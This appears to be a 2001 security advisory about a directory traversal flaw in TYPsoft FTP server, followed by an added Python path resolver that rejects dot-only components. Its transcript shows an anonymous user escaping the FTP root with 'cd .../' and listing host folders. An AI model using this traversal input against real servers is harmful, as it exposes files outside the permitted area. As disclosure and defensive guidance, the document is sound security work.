COMMAND

    TYPsoft FTP server

SYSTEMS AFFECTED

    TYPsoft FTP server v0.93..0.95 (others?)

PROBLEM

    SosPiro found the following.  TYPsoft FTP Server is a freeware FTP
    server.  An attacker with anonymous access to the FTP server can
    break out of the FTP root using the dot vulnerability: the server
    rejects "cd ../" but accepts "cd .../".  This is the problem:

        >ftp 127.0.0.1
        220 TYPsoft  FTP server 0.95 ready...
        User (127.0.0.1:(none)): anonymous
        331  Password required for anonymous.
        Password:
        230 User anonymous logged in.
        ftp>pwd
        257  " / "  is current directory.
        ftp>cd ../
        501 CWD failed. Cannot  accept relative path using dot  notation.
        ftp> cd .../
        250 CWD command successful. "/.../" is current directory.
        ftp>dir
        drw-rw-rw-             1 ftp           ftp                 0 May   01 19:44
        FTP Server
        drw-rw-rw-             1 ftp           ftp                 0 May   01 19:47
        temp
        drw-rw-rw-             1 ftp           ftp                 0 Dec    24 2000
        windows
        .....
        226 Transfer complete.
        ftp>

SOLUTION

    TYPsoft staff were contacted on Tuesday, 1 May 2001, and no reply
    was received.
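
    Added example, not part of the original advisory and not TYPsoft
    code: a hypothetical filter that blocks only "." and ".." (the
    behaviour the transcript suggests) next to a resolver that also
    rejects ".../".  All function names are illustrative; it assumes the
    host treats a component of three or more dots as a multi-level
    parent reference, as Windows 9x does.

```python
import re

# Components made only of dots ("...", "....").  ".." is handled separately.
_DOTS_ONLY = re.compile(r"^\.{2,}$")


class PathRejected(Exception):
    """Raised when a client-supplied path must not be honoured."""


def naive_filter(requested):
    """Hypothetical weak check: blocks '.' and '..' components only."""
    parts = [p for p in requested.replace("\\", "/").split("/") if p]
    return not any(p in (".", "..") for p in parts)


def resolve_virtual_path(cwd, requested):
    """Return the normalised virtual path for a CWD-style request.

    cwd and the result are absolute virtual paths rooted at '/', the FTP
    root.  Nothing here touches the file system; the caller maps the
    result under the real root directory.
    """
    requested = requested.replace("\\", "/")
    # Absolute requests start at the virtual root, relative ones at cwd.
    stack = [] if requested.startswith("/") else [p for p in cwd.split("/") if p]
    for part in requested.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                raise PathRejected("attempt to climb above FTP root")
            stack.pop()
            continue
        if _DOTS_ONLY.match(part):
            raise PathRejected("dot-only component: %r" % part)
        if part[-1] in ". ":
            # Windows strips trailing dots and spaces, so "temp." == "temp".
            raise PathRejected("trailing dot or space: %r" % part)
        if any(c in part for c in ':*?"<>|') or any(ord(c) < 32 for c in part):
            raise PathRejected("illegal character in %r" % part)
        stack.append(part)
    return "/" + "/".join(stack)
```

    The resolver works on the virtual path only, so the decision does
    not depend on how the underlying file system expands dot sequences.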